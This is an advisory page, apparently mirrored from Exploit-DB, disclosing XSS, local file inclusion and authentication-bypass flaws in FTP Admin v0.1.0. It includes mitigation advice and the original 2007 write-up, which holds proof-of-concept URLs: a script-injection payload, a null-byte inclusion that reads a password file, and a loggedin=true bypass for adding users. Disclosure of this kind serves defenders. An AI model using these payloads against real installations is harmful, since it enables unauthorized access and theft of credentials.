FTP Admin v0.1.0 - MULTIPLE VULNERABILITIES

vendor:

FTP Admin

by:

Omni

5.5

CVSS

MEDIUM

XSS, Local File Inclusion, Admin Bypass

79, 98

CWE

Product Name: FTP Admin

Affected Version From: v0.1.0

Affected Version To: v0.1.0

Patch Exists: NO

Related CWE:

CPE: a:ftp_admin:ftp_admin:0.1.0

Metasploit:

Other Scripts:

Platforms Tested:

2007

FTP Admin v0.1.0 – MULTIPLE VULNERABILITIES

The FTP Admin v0.1.0 web-based user administration tool is vulnerable to multiple vulnerabilities including XSS, Local File Inclusion, and Admin Bypass. The XSS vulnerability allows an attacker to inject arbitrary HTML or script code into the error parameter of the index.php page. The Local File Inclusion vulnerability allows an attacker to include arbitrary local files by manipulating the page parameter of the index.php page. The Admin Bypass vulnerability allows an attacker to bypass authentication by manipulating the loggedin parameter of the index.php page.

Mitigation:

To mitigate these vulnerabilities, it is recommended to sanitize and validate user input before using it in the application. Additionally, access controls should be implemented to prevent unauthorized access to sensitive files or functionalities. It is also recommended to keep the application up to date with the latest patches and security updates.

Source

Exploit-DB raw data:

FTP Admin v0.1.0 - MULTIPLE VULNERABILITIES
	by Omni

1) Infos
---------
Date            : 2007-11-28
Product         : FTP Admin
Version         : v0.1.0
Vendor          : http://sourceforge.net/projects/ftpadmin/
Vendor Status   : 2007-11-30 Informed!

Description     : FTP admin is a web-based user administration tool, for usage in combination with vsftpd. FTP admin
                  requires sudo. Features include modification of users and generation of user passwords.

Source          : omnipresent - omni
E-mail          : omnipresent[at]NOSPAMemail[dot]it - omni[at]NOSPAMplayhack[dot]net
Team            : Playhack.net Security

2) Security Issues
-------------------

--- [ XSS ] ---
===============================================

I think that is better let you see a PoC instead of explain where is the bug.. If you want to know it just look at the 
source code.

--- [ PoC ] ---
===============

http://localhost/ft/index.php?page=error&error=<b>...</b>
http://localhost/ft/index.php?page=error&error=<script>alert(1)</script>


--- [ Local File Inclusion ] ---
================================

Take a look in index.php, line 49:
include("$page.php");

Remembe that you have to log in to made local file inclusion (loggedin = true -> register_global = On)

[ Remembe that ]
if(!is_file($page . ".php") || (!is_readable($page . ".php"))) {
		$page = "error";
		$error = "Page does not exist or is not readable\n";
	}
}
[ /Remembe that ]

--- [ PoC ] ---
===============

http://localhost/ft/index.php?page=pass.txt%00&loggedin=true

To see pass.txt ...

--- [ Admin Bypass ] ---
================================

Today I'm too lazy to explain what's wrong.. so take a look in the source code and watch the var $loggedin !!

--- [ PoC ] ---
===============

To add a user...

http://localhost/ft/index.php?page=add&loggedin=true

# milw0rm.com [2007-11-29]